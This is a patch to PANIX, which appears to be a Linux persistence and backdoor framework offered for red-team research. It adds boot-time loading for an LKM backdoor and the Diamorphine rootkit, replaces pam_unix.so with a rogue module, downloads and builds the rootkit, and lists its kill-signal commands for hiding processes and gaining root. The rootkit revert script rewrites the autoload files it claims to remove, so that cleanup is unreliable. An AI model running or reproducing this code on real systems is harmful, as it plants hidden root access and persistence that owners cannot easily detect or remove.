From ca88d6a34358f3605d95e5e68cc3eea723e9f416 Mon Sep 17 00:00:00 2001 From: Ruben Groenewoud <78494512+Aegrah@users.noreply.github.com> Date: Thu, 19 Dec 2024 14:40:39 +0100 Subject: [PATCH] [Improvements] Several improvements and fixes for PANIX v2.0.1 release --- README.md | 88 ++-- modules/revert/revert_lkm.sh | 6 + modules/revert/revert_malicious_package.sh | 165 +++---- modules/revert/revert_pam.sh | 89 +--- modules/revert/revert_rootkit.sh | 18 + modules/setup_lkm.sh | 51 ++- modules/setup_pam.sh | 9 +- modules/setup_rootkit.sh | 155 ++++--- panix.sh | 481 +++++++++++---------- 9 files changed, 554 insertions(+), 508 deletions(-) diff --git a/README.md b/README.md index e38a66f..2cefc93 100644 --- a/README.md +++ b/README.md @@ -14,52 +14,52 @@ PANIX provides a versatile suite of features for simulating and researching Linu | **Feature** | **Description** |**Root**|**User**| |----------------------------------|-----------------------------------------------------------------------------------------|--------|--------| -| **At Job Persistence** | Implements persistence by adding entries to system jobs. | ✔️ | ✔️ | -| **Authorized Keys** | Adds a public key to the authorized_keys file for SSH access. | ✔️ | ✔️ | -| **Backdoor User** | Creates a backdoor user with `UID=0` (root privileges). | ✔️ | ❌ | -| **Backdoored /etc/passwd** | Directly adds a malicious user entry to `/etc/passwd`. | ✔️ | ❌ | -| **Backdoored /etc/init.d** | Establishes persistence via SysVinit (`/etc/init.d`). | ✔️ | ❌ | -| **Backdoored /etc/rc.local** | Establishes persistence via run control (`/etc/rc.local`). | ✔️ | ❌ | -| **Bind Shell** | Runs a pre-compiled/LOLBin bind shell for remote access. | ✔️ | ✔️ | -| **Capabilities Backdoor** | Adds specific capabilities to binaries to maintain persistence. | ✔️ | ❌ | -| **Cron Job Persistence** | Sets up cron jobs to ensure persistence across reboots. | ✔️ | ✔️ | -| **Create User** | Creates a new user account on the system. | ✔️ | ❌ | -| **Diamorphine Rootkit** | Installs the Diamorphine Loadable Kernel Module Rootkit. | ✔️ | ❌ | -| **Git Persistence** | Utilizes Git hooks or pagers to persist within Git repositories. | ✔️ | ✔️ | -| **Generator Persistence** | Leverages systemd generators to create persistent services. | ✔️ | ❌ | -| **Malicious Container** | Deploys a Docker container designed to host escape. | ✔️ | ✔️ | -| **Malicious Package** | Installs a `DPKG/RPM` package to achieve persistence. | ✔️ | ❌ | -| **LD_PRELOAD Backdoor** | Uses `LD_PRELOAD` to inject malicious libraries for persistence. | ✔️ | ❌ | -| **LKM Backdoor** | Loads a Loadable Kernel Module to maintain persistence. | ✔️ | ❌ | -| **MOTD Backdoor** | Alters Message of the Day (MOTD) to establish persistence. | ✔️ | ❌ | -| **Package Manager** | Manipulates `APT/YUM/DNF` to establish persistence on usage. | ✔️ | ❌ | -| **PAM Persistence** | Installs a PAM backdoor using a rogue module or pam_exec. | ✔️ | ❌ | -| **Password Change** | Changes user passwords to secure backdoor accounts. | ✔️ | ❌ | -| **Reverse Shell** | Establishes a reverse shell (supporting multiple LOLBins). | ✔️ | ✔️ | -| **Shell Profile Persistence** | Modifies shell profiles to execute scripts upon user login. | ✔️ | ✔️ | -| **SSH Key Persistence** | Manipulates SSH keys to maintain persistent access via SSH. | ✔️ | ✔️ | -| **Sudoers Backdoor** | Alters the `/etc/sudoers` file to grant elevated privileges. | ✔️ | ❌ | -| **SUID Backdoor** | Backdoors binaries by setting the SUID bit. | ✔️ | ❌ | -| **System Binary Backdoor** | Wraps system binaries to include backdoor functionality. | ✔️ | ❌ | -| **Systemd Service** | Creates systemd services that ensure persistence on reboot. | ✔️ | ✔️ | -| **Udev Persistence** | Utilizes drivers to persist at the hardware interaction level. | ✔️ | ❌ | -| **Web Shell Persistence** | Deploys web servers for remote access via web interfaces. | ✔️ | ✔️ | -| **XDG Autostart Persistence** | Employs XDG autostart directories to persist upon user login. | ✔️ | ✔️ | +| **At Job Persistence** | Implements persistence by adding entries to system jobs. | ✅ | ✅ | +| **Authorized Keys** | Adds a public key to the authorized_keys file for SSH access. | ✅ | ✅ | +| **Backdoor User** | Creates a backdoor user with `UID=0` (root privileges). | ✅ | ❌ | +| **Backdoored /etc/passwd** | Directly adds a malicious user entry to `/etc/passwd`. | ✅ | ❌ | +| **Backdoored /etc/init.d** | Establishes persistence via SysVinit (`/etc/init.d`). | ✅ | ❌ | +| **Backdoored /etc/rc.local** | Establishes persistence via run control (`/etc/rc.local`). | ✅ | ❌ | +| **Bind Shell** | Runs a pre-compiled/LOLBin bind shell for remote access. | ✅ | ✅ | +| **Capabilities Backdoor** | Adds specific capabilities to binaries to maintain persistence. | ✅ | ❌ | +| **Cron Job Persistence** | Sets up cron jobs to ensure persistence across reboots. | ✅ | ✅ | +| **Create User** | Creates a new user account on the system. | ✅ | ❌ | +| **Diamorphine Rootkit** | Installs the Diamorphine Loadable Kernel Module Rootkit. | ✅ | ❌ | +| **Git Persistence** | Utilizes Git hooks or pagers to persist within Git repositories. | ✅ | ✅ | +| **Generator Persistence** | Leverages systemd generators to create persistent services. | ✅ | ❌ | +| **Malicious Container** | Deploys a Docker container designed to host escape. | ✅ | ✅ | +| **Malicious Package** | Installs a `DPKG/RPM` package to achieve persistence. | ✅ | ❌ | +| **LD_PRELOAD Backdoor** | Uses `LD_PRELOAD` to inject malicious libraries for persistence. | ✅ | ❌ | +| **LKM Backdoor** | Loads a Loadable Kernel Module to maintain persistence. | ✅ | ❌ | +| **MOTD Backdoor** | Alters Message of the Day (MOTD) to establish persistence. | ✅ | ❌ | +| **Package Manager** | Manipulates `APT/YUM/DNF` to establish persistence on usage. | ✅ | ❌ | +| **PAM Persistence** | Installs a PAM backdoor using a rogue module or pam_exec. | ✅ | ❌ | +| **Password Change** | Changes user passwords to secure backdoor accounts. | ✅ | ❌ | +| **Reverse Shell** | Establishes a reverse shell (supporting multiple LOLBins). | ✅ | ✅ | +| **Shell Profile Persistence** | Modifies shell profiles to execute scripts upon user login. | ✅ | ✅ | +| **SSH Key Persistence** | Manipulates SSH keys to maintain persistent access via SSH. | ✅ | ✅ | +| **Sudoers Backdoor** | Alters the `/etc/sudoers` file to grant elevated privileges. | ✅ | ❌ | +| **SUID Backdoor** | Backdoors binaries by setting the SUID bit. | ✅ | ❌ | +| **System Binary Backdoor** | Wraps system binaries to include backdoor functionality. | ✅ | ❌ | +| **Systemd Service** | Creates systemd services that ensure persistence on reboot. | ✅ | ✅ | +| **Udev Persistence** | Utilizes drivers to persist at the hardware interaction level. | ✅ | ❌ | +| **Web Shell Persistence** | Deploys web servers for remote access via web interfaces. | ✅ | ✅ | +| **XDG Autostart Persistence** | Employs XDG autostart directories to persist upon user login. | ✅ | ✅ | ![](https://i.imgur.com/waxVImv.png) # Support PANIX offers comprehensive support across various Linux distributions. -| **Distribution** | **Support** | **Tested Version** | -|------------------|---------|-------------------------------------------| -| **Debian** | ✔️ | Debian 11 & 12 | -| **Ubuntu** | ✔️ | Ubuntu 22.04 (Diamorphine unavailable) | -| **RHEL** | ✔️ | RHEL 9 (MOTD unavailable) | -| **CentOS** | ✔️ | CentOS Stream 9 & 7 (MOTD unavailable) | -| **Fedora** | ✔️ | Not fully tested | -| **Arch Linux** | ✔️ | Not fully tested | -| **OpenSUSE** | ✔️ | Not fully tested | +| **Distribution** | **Support** | **Tested Version** | +|------------------|-----------|----------------------------------------| +| **Debian** | ✅ | Debian 11 & 12 | +| **Ubuntu** | ✅ | Ubuntu 22.04 (Diamorphine unavailable) | +| **RHEL** | ✅ | RHEL 9 (MOTD unavailable) | +| **CentOS** | ✅ | CentOS Stream 9 & 7 (MOTD unavailable) | +| **Fedora** | ✅ | Not fully tested | +| **Arch Linux** | ✅ | Not fully tested | +| **OpenSUSE** | ✅ | Not fully tested | Custom or outdated Linux distributions may have different configurations or lack specific features, causing mechanisms to fail on untested versions. If a default command fails, use the `--custom` flag available in most features to adjust paths and commands for your environment. If that doesn't resolve the issue, review and modify the script to suit your needs. @@ -97,15 +97,15 @@ This streamlined structure promotes efficient development, testing, and deployme ![](https://i.imgur.com/waxVImv.png) # Getting Started -Getting PANIX up-and-running is as simple as downloading the script from the [release page](https://github.com/Aegrah/PANIX/releases/tag/panix-v2.0.0) and executing it: +Getting PANIX up-and-running is as simple as downloading the script from the [release page](https://github.com/Aegrah/PANIX/releases/tag/panix-v2.0.1) and executing it: ``` -curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh | bash +curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.1/panix.sh | bash ``` Or download it and execute it manually: ``` # Download through curl or wget -curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -o panix.sh -wget https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -O panix.sh +curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.1/panix.sh -o panix.sh +wget https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.1/panix.sh -O panix.sh # Grant execution permissions and execute the script. chmod +x panix.sh diff --git a/modules/revert/revert_lkm.sh b/modules/revert/revert_lkm.sh index 3cefc63..81f980d 100644 --- a/modules/revert/revert_lkm.sh +++ b/modules/revert/revert_lkm.sh @@ -53,6 +53,12 @@ revert_lkm() { echo "[-] Temporary directory '${lkm_compile_dir}' not found." fi + # Remove panix from /etc/modules, /etc/modules-load.d/panix.conf and /usr/lib/modules-load.d/panix.conf + echo "[+] Removing panix from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..." + sed -i '/panix/d' /etc/modules + rm -f /etc/modules-load.d/panix.conf + rm -f /usr/lib/modules-load.d/panix.conf + # Update module dependencies echo "[+] Updating module dependencies..." depmod -a diff --git a/modules/revert/revert_malicious_package.sh b/modules/revert/revert_malicious_package.sh index 7d7dd08..1991dad 100644 --- a/modules/revert/revert_malicious_package.sh +++ b/modules/revert/revert_malicious_package.sh @@ -1,93 +1,100 @@ revert_malicious_package() { - usage_revert_malicious_package() { - echo "Usage: ./panix.sh --revert malicious-package" - echo "Reverts any changes made by the setup_malicious_package module." - } + usage_revert_malicious_package() { + echo "Usage: ./panix.sh --revert malicious-package" + echo "Reverts any changes made by the setup_malicious_package module." + } - echo "[+] Reverting malicious package..." + echo "[+] Reverting malicious package..." - if ! check_root; then - echo "Error: This function can only be run as root." - return 1 - fi + if ! check_root; then + echo "Error: This function can only be run as root." + return 1 + fi - local mechanism="" - local PACKAGE_NAME="panix" + local mechanism="" + local PACKAGE_NAME="panix" - # Detect if RPM or DPKG was used - if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then - mechanism="rpm" - elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii ${PACKAGE_NAME} "; then - mechanism="dpkg" - else - echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed." - fi + # Detect if RPM or DPKG was used + if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then + mechanism="rpm" + elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii ${PACKAGE_NAME} "; then + mechanism="dpkg" + else + echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed." + fi - if [[ "$mechanism" == "rpm" ]]; then - echo "[+] Removing RPM package '${PACKAGE_NAME}'..." - rpm -e --noscripts "${PACKAGE_NAME}" - if [[ $? -eq 0 ]]; then - echo "[+] RPM package '${PACKAGE_NAME}' removed successfully." - else - echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'." - fi + if [[ "$mechanism" == "rpm" ]]; then + echo "[+] Removing RPM package '${PACKAGE_NAME}'..." + rpm -e --noscripts "${PACKAGE_NAME}" + if [[ $? -eq 0 ]]; then + echo "[+] RPM package '${PACKAGE_NAME}' removed successfully." + else + echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'." + fi - # Remove the RPM file from /var/lib/rpm - if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then - echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..." - rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" - echo "[+] RPM file removed." - else - echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found." - fi + # Remove the RPM file from /var/lib/rpm + if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then + echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..." + rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" + echo "[+] RPM file removed." + else + echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found." + fi - elif [[ "$mechanism" == "dpkg" ]]; then - echo "[+] Removing DPKG package '${PACKAGE_NAME}'..." - dpkg --purge "${PACKAGE_NAME}" - if [[ $? -eq 0 ]]; then - echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully." - else - echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'." - fi - fi + elif [[ "$mechanism" == "dpkg" ]]; then + echo "[+] Removing DPKG package '${PACKAGE_NAME}'..." + dpkg --purge "${PACKAGE_NAME}" + if [[ $? -eq 0 ]]; then + echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully." + else + echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'." + fi + fi - # Remove the cron job added by the setup function - echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..." - # Create a temporary file to store the current crontab - crontab -l > /tmp/current_cron$$ 2>/dev/null - if [[ $? -ne 0 ]]; then - echo "[-] No crontab for user $(whoami). No action needed." - rm -f /tmp/current_cron$$ - else - # Remove lines containing the malicious package commands - grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$ - # Install the new crontab - crontab /tmp/new_cron$$ - echo "[+] Cron job removed." - # Clean up temporary files - rm -f /tmp/current_cron$$ /tmp/new_cron$$ - fi + # Remove the cron job added by the setup function + echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..." + # Create a temporary file to store the current crontab + crontab -l > /tmp/current_cron$$ 2>/dev/null + if [[ $? -ne 0 ]]; then + echo "[-] No crontab for user $(whoami). No action needed." + rm -f /tmp/current_cron$$ + else + # Remove lines containing the malicious package commands + grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$ + # Install the new crontab + crontab /tmp/new_cron$$ + echo "[+] Cron job removed." + # Clean up temporary files + rm -f /tmp/current_cron$$ /tmp/new_cron$$ + fi - # Clean up any remaining build directories (RPM) - if [[ -d "~/rpmbuild" ]]; then - echo "[+] Removing RPM build directory '~/rpmbuild'..." - rm -rf ~/rpmbuild - echo "[+] RPM build directory removed." - fi + # Clean up any remaining build directories (RPM) + if [[ -d "~/rpmbuild" ]]; then + echo "[+] Removing RPM build directory '~/rpmbuild'..." + rm -rf ~/rpmbuild + echo "[+] RPM build directory removed." + fi - # Clean up any remaining package directories (DPKG) - if [[ -d "${PACKAGE_NAME}" ]]; then - echo "[+] Removing package directory '${PACKAGE_NAME}'..." - rm -rf "${PACKAGE_NAME}" - echo "[+] Package directory removed." - fi + # Clean up any remaining package directories (DPKG) + if [[ -d "${PACKAGE_NAME}" ]]; then + echo "[+] Removing package directory '${PACKAGE_NAME}'..." + rm -rf "${PACKAGE_NAME}" + echo "[+] Package directory removed." + fi - # Remove any lingering files in /var/lib/dpkg/info (DPKG) - if [[ -d "/var/lib/dpkg/info" ]]; then - echo "[+] Cleaning up '/var/lib/dpkg/info'..." - rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."* - echo "[+] Cleanup completed." - fi + # Remove any lingering files in /var/lib/dpkg/info (DPKG) + if [[ -d "/var/lib/dpkg/info" ]]; then + echo "[+] Cleaning up '/var/lib/dpkg/info'..." + rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."* + echo "[+] Cleanup completed." + fi - return 0 + # Remove any package files left in the home directory + if [[ -f "~/${PACKAGE_NAME}.deb" || -f "~/${PACKAGE_NAME}.rpm" ]]; then + echo "[+] Removing package files '~/${PACKAGE_NAME}.deb' and/or '~/${PACKAGE_NAME}.rpm'..." + rm -f ~/${PACKAGE_NAME}.deb ~/${PACKAGE_NAME}.rpm + echo "[+] Package files removed." + fi + + return 0 } diff --git a/modules/revert/revert_pam.sh b/modules/revert/revert_pam.sh index 1716ae6..70e9860 100644 --- a/modules/revert/revert_pam.sh +++ b/modules/revert/revert_pam.sh @@ -9,52 +9,29 @@ revert_pam() { return 1 fi - # Function to restore the original pam_unix.so module - restore_pam_module() { - echo "[+] Restoring original PAM module..." - - # Detect the Linux distribution and package manager - if [ -f /etc/os-release ]; then - . /etc/os-release - linux_distro=${ID_LIKE:-$ID} - else - linux_distro=$(uname -s | tr '[:upper:]' '[:lower:]') - fi - - case "$linux_distro" in - *ubuntu*|*debian*|*mint*|*kali*) - echo "[+] Detected Debian-based distribution." - echo "[+] Reinstalling 'libpam-modules' package..." - apt-get update >/dev/null 2>&1 - apt-get install --reinstall -y libpam-modules >/dev/null 2>&1 + remove_rogue_pam() { + echo "[+] Searching for rogue PAM module" + # Check for the presence of the malicious PAM module + pam_module_paths=( + "/lib/security/pam_unix.so" + "/usr/lib/security/pam_unix.so" + "/usr/lib64/security/pam_unix.so" + "/lib/x86_64-linux-gnu/security/pam_unix.so" + "/usr/lib/x86_64-linux-gnu/security/pam_unix.so" + "/lib64/security/pam_unix.so" + ) + + # Revert pam_unix.so with the pam_unix.so.bak backup + for pam_module in "${pam_module_paths[@]}"; do + if [[ -f "$pam_module.bak" ]]; then + mv -f "$pam_module.bak" "$pam_module" if [[ $? -eq 0 ]]; then - echo "[+] 'libpam-modules' reinstalled successfully." + echo "[+] Restored original PAM module '$pam_module'." else - echo "[-] Failed to reinstall 'libpam-modules'." + echo "[-] Failed to restore original PAM module '$pam_module'." fi - ;; - *rhel*|*centos*|*fedora*) - echo "[+] Detected RPM-based distribution." - echo "[+] Reinstalling 'pam' package..." - if command -v yum &>/dev/null; then - yum reinstall -y pam >/dev/null 2>&1 - elif command -v dnf &>/dev/null; then - dnf reinstall -y pam >/dev/null 2>&1 - else - echo "[-] Neither 'yum' nor 'dnf' package manager found." - return 1 - fi - if [[ $? -eq 0 ]]; then - echo "[+] 'pam' reinstalled successfully." - else - echo "[-] Failed to reinstall 'pam'." - fi - ;; - *) - echo "[-] Unsupported distribution: $linux_distro" - return 1 - ;; - esac + fi + done } # Function to remove malicious PAM_EXEC configurations and scripts @@ -135,32 +112,8 @@ revert_pam() { fi } - # Check for the presence of the malicious PAM module - is_pam_module_replaced=false - pam_module_paths=( - "/lib/security/pam_unix.so" - "/usr/lib64/security/pam_unix.so" - "/lib/x86_64-linux-gnu/security/pam_unix.so" - "/lib64/security/pam_unix.so" - ) - for pam_module in "${pam_module_paths[@]}"; do - if [[ -f "$pam_module" ]]; then - # Check if the pam_unix.so has been modified - if strings "$pam_module" | grep -q "PANIX"; then - is_pam_module_replaced=true - break - fi - fi - done - - if [[ "$is_pam_module_replaced" = true ]]; then - echo "[+] Malicious PAM module detected." - restore_pam_module - else - echo "[-] No malicious PAM module detected." - fi - # Remove PAM_EXEC backdoor and logging + remove_rogue_pam remove_pam_exec_backdoor remove_pam_exec_logging diff --git a/modules/revert/revert_rootkit.sh b/modules/revert/revert_rootkit.sh index 0e27437..5ae4309 100644 --- a/modules/revert/revert_rootkit.sh +++ b/modules/revert/revert_rootkit.sh @@ -100,6 +100,24 @@ revert_rootkit() { done fi + # Remove the module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/ + echo "[+] Removing rootkit module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..." + if [ -d "/etc/modules-load.d" ]; then + echo "${rk_name}" > /etc/modules-load.d/${rk_name}.conf + fi + + if [ -d "/usr/lib/modules-load.d" ]; then + echo "${rk_name}" > /usr/lib/modules-load.d/${rk_name}.conf + fi + + if [ -f "/etc/modules" ]; then + if grep -q "^${rk_name}$" /etc/modules; then + sed -i "/^${rk_name}$/d" /etc/modules + fi + fi + + echo "[+] Rootkit module removed from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/" + # Step 4: Remove /dev/shm/.rk directory remove_directory "$rk_path" diff --git a/modules/setup_lkm.sh b/modules/setup_lkm.sh index 0a790c8..3075631 100644 --- a/modules/setup_lkm.sh +++ b/modules/setup_lkm.sh @@ -130,10 +130,10 @@ setup_lkm_backdoor() { # Ensure proper escaping for C string command="\"/bin/bash\",\"-c\",\"$command\",NULL" lkm_destination="$lkm_path" - mkdir -p $(dirname $lkm_destination) + mkdir -p $(dirname $lkm_destination) fi - mkdir -p ${lkm_compile_dir} + mkdir -p ${lkm_compile_dir} cat <<-EOF > ${lkm_source} #include @@ -176,12 +176,12 @@ setup_lkm_backdoor() { MODULE_DESCRIPTION("LKM Backdoor"); EOF - # Check if the source file was created - if [ ! -f "$lkm_source" ]; then - echo "Failed to create the kernel module source code at $lkm_source" - exit 1 - else - echo "Kernel module source code created: $lkm_source" + # Check if the source file was created + if [ ! -f "$lkm_source" ]; then + echo "[-] Failed to create the kernel module source code at $lkm_source" + exit 1 + else + echo "[+] Kernel module source code created: $lkm_source" fi # Create the Makefile @@ -196,11 +196,11 @@ clean: make -C /lib/modules/\$(shell uname -r)/build M=\$(PWD) clean EOF - if [ ! -f "${lkm_compile_dir}/Makefile" ]; then - echo "Failed to create the Makefile at ${lkm_compile_dir}/Makefile" + if [ ! -f "${lkm_compile_dir}/Makefile" ]; then + echo "[-] Failed to create the Makefile at ${lkm_compile_dir}/Makefile" exit 1 - else - echo "Makefile created: ${lkm_compile_dir}/Makefile" + else + echo "[+] Makefile created: ${lkm_compile_dir}/Makefile" fi # Compile the kernel module using make @@ -208,7 +208,7 @@ EOF make if [ $? -ne 0 ]; then - echo "Compilation failed. Exiting." + echo "[-] Compilation failed. Exiting." exit 1 fi @@ -216,18 +216,35 @@ EOF cp ${lkm_compile_dir}/${lkm_name}.ko ${lkm_destination} if [ $? -ne 0 ]; then - echo "Copying module failed. Exiting." + echo "[-] Copying module failed. Exiting." exit 1 fi - echo "Kernel module compiled successfully: ${lkm_destination}" + echo "[+] Kernel module compiled successfully: ${lkm_destination}" sudo insmod ${lkm_destination} if [[ $? -ne 0 ]]; then - echo "Failed to load the kernel module. Check dmesg for errors." + echo "[-] Failed to load the kernel module. Check dmesg for errors." exit 1 fi - echo "Kernel module loaded successfully. Check dmesg for the output." + # Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/ + echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..." + if [ -d "/etc/modules-load.d" ]; then + echo "${lkm_name}" > /etc/modules-load.d/${lkm_name}.conf + fi + + if [ -d "/usr/lib/modules-load.d" ]; then + echo "${lkm_name}" > /usr/lib/modules-load.d/${lkm_name}.conf + fi + + if [ -f "/etc/modules" ]; then + if ! grep -q "^${lkm_name}$" /etc/modules; then + echo "${lkm_name}" >> /etc/modules + fi + fi + + echo "[+] Kernel module loaded successfully. Check dmesg for the output." + echo "[+] Kernel module added to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/" echo "[+] LKM backdoor established!" } diff --git a/modules/setup_pam.sh b/modules/setup_pam.sh index ce5c1f5..94b549d 100644 --- a/modules/setup_pam.sh +++ b/modules/setup_pam.sh @@ -215,9 +215,11 @@ setup_pam_persistence() { local dest_dir="" local possible_dirs=( "/lib/security" - "/usr/lib64/security" - "/lib/x86_64-linux-gnu/security" "/lib64/security" + "/lib/x86_64-linux-gnu/security" + "/usr/lib/security" + "/usr/lib64/security" + "/usr/lib/x86_64-linux-gnu/security" ) for dir in "${possible_dirs[@]}"; do @@ -232,6 +234,9 @@ setup_pam_persistence() { exit 1 fi + echo "[+] Backing up original PAM library..." + mv -f "$dest_dir/pam_unix.so" "$dest_dir/pam_unix.so.bak" + echo "[+] Copying PAM library to $dest_dir..." mv -f modules/pam_unix/.libs/pam_unix.so "$dest_dir" diff --git a/modules/setup_rootkit.sh b/modules/setup_rootkit.sh index 91fa759..0c71ffc 100644 --- a/modules/setup_rootkit.sh +++ b/modules/setup_rootkit.sh @@ -1,23 +1,23 @@ setup_rootkit() { - # References: - # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine - # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh - # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194 - - local rk_path="/dev/shm/.rk" - local tmp_path="/tmp" - local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip" - local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar" - local clone_url="https://github.com/Aegrah/Diamorphine.git" - local secret="" - local identifier="" + # References: + # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine + # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh + # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194 + + local rk_path="/dev/shm/.rk" + local tmp_path="/tmp" + local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip" + local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar" + local clone_url="https://github.com/Aegrah/Diamorphine.git" + local secret="" + local identifier="" if ! check_root; then echo "Error: This function can only be run as root." exit 1 fi - usage_rootkit() { + usage_rootkit() { echo "Usage: ./panix.sh --rootkit" echo "--examples Display command examples" echo "--secret Specify the secret" @@ -82,57 +82,57 @@ setup_rootkit() { exit 1 fi - echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04." - echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7." - echo "[!] I cannot guarantee that it will work on other distributions." - sleep 5 - - mkdir -p $rk_path - - # Check if wget or curl is installed - if command -v wget >/dev/null 2>&1; then - downloader="wget" - elif command -v curl >/dev/null 2>&1; then - downloader="curl" - else - echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed." - exit 1 - fi - - # Function to download files using the available downloader - download_file() { - local url="$1" - local output="$2" - if [ "$downloader" = "wget" ]; then - wget -O "$output" "$url" - else - curl -L -o "$output" "$url" - fi - } - - # Check for zip/unzip - if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then - echo "zip/unzip is available. Downloading diamorphine.zip..." - download_file "${zip_url}" "${tmp_path}/diamorphine.zip" - unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine" + echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04." + echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7." + echo "[!] I cannot guarantee that it will work on other distributions." + sleep 5 + + mkdir -p $rk_path + + # Check if wget or curl is installed + if command -v wget >/dev/null 2>&1; then + downloader="wget" + elif command -v curl >/dev/null 2>&1; then + downloader="curl" + else + echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed." + exit 1 + fi + + # Function to download files using the available downloader + download_file() { + local url="$1" + local output="$2" + if [ "$downloader" = "wget" ]; then + wget -O "$output" "$url" + else + curl -L -o "$output" "$url" + fi + } + + # Check for zip/unzip + if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then + echo "zip/unzip is available. Downloading diamorphine.zip..." + download_file "${zip_url}" "${tmp_path}/diamorphine.zip" + unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine" mv ${tmp_path}/diamorphine/Diamorphine-master/* "${rk_path}/" - # Check for tar - elif command -v tar >/dev/null 2>&1; then - echo "tar is available. Downloading diamorphine.tar..." - download_file "${tar_url}" "${tmp_path}/diamorphine.tar" - tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1 + # Check for tar + elif command -v tar >/dev/null 2>&1; then + echo "tar is available. Downloading diamorphine.tar..." + download_file "${tar_url}" "${tmp_path}/diamorphine.tar" + tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1 - # Check for git - elif command -v git >/dev/null 2>&1; then - echo "git is available. Cloning diamorphine.git..." - git clone "${clone_url}" "${tmp_path}/diamorphine" + # Check for git + elif command -v git >/dev/null 2>&1; then + echo "git is available. Cloning diamorphine.git..." + git clone "${clone_url}" "${tmp_path}/diamorphine" mv ${tmp_path}/diamorphine/* "${rk_path}/" - # If none are available - else - echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually." - exit 1 - fi + # If none are available + else + echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually." + exit 1 + fi # Obfuscate most obvious strings # Files @@ -186,15 +186,32 @@ setup_rootkit() { fi make -C ${rk_path} clean - touch ${rk_path}/restore_${identifier}.ko + touch ${rk_path}/restore_${identifier}.ko + + # Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/ + echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d..." + + if [ -d "/etc/modules-load.d" ]; then + echo "${identifier}" > /etc/modules-load.d/${identifier}.conf + fi + + if [ -d "/usr/lib/modules-load.d" ]; then + echo "${identifier}" > /usr/lib/modules-load.d/${identifier}.conf + fi + + if [ -f "/etc/modules" ]; then + if ! grep -q "^${identifier}$" /etc/modules; then + echo "${identifier}" >> /etc/modules + fi + fi echo "[+] Diamorphine rootkit has been installed." - echo "[+] The secret is: ${secret}" - echo "[+] The identifier is: ${identifier}" - - echo "[+] kill -31 pid: hide/unhide any process;" - echo "[+] kill -63 pid: turns the module (in)visible;" - echo "[+] kill -64 pid: become root;" - echo "[+] Any file starting with ${secret} is 